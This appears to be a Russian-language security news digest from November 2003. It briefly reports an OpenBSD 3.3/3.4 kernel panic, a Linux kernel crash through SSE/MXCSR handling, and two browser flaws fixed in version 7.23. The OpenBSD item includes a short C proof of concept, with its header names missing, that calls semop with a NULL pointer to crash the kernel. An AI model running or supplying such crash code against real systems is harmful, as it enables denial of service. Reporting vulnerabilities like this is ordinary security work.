24.11.2003
Уязвимы версии 3.3 и 3.4 OpenBSD.
Утверждается, что следующая программка повергает ядро в панику:
/* BEGIN CODE */
#include
#include
#include
#include
int
main()
{
int i;
for(i = 0; i < 0x40; i++)
semop(i, (struct sembuf *) NULL, 0);
}
/* END CODE */
| 24.11.2003 | 06:56 | Источник: | Комментариев: 2
Уязвимость в ядрах Linux версий до 2.4.21 включительно. Связана с обработкой SSE инструкций с использованием регистра MXCSR и позволяет непривилегированному пользователю положить (crash) ядро.
| 24.11.2003 | 06:49 | Источник: | Комментариев: 2
Затронуты все версии до 7.22 включительно. Первая связана с серфингом по локальным каталогам и позволяет атакующему загрузить в систему жертвы файл по произвольному локальному пути (наверное с учетом локальных привилегий запустившего браузер - SA). Вторая - это переполнение буфера при обработке файла скина.
В связи с этим выпущена bugfix-версия 7.23.
| 24.11.2003 | 06:34 | Источник: | Комментариев: 0
|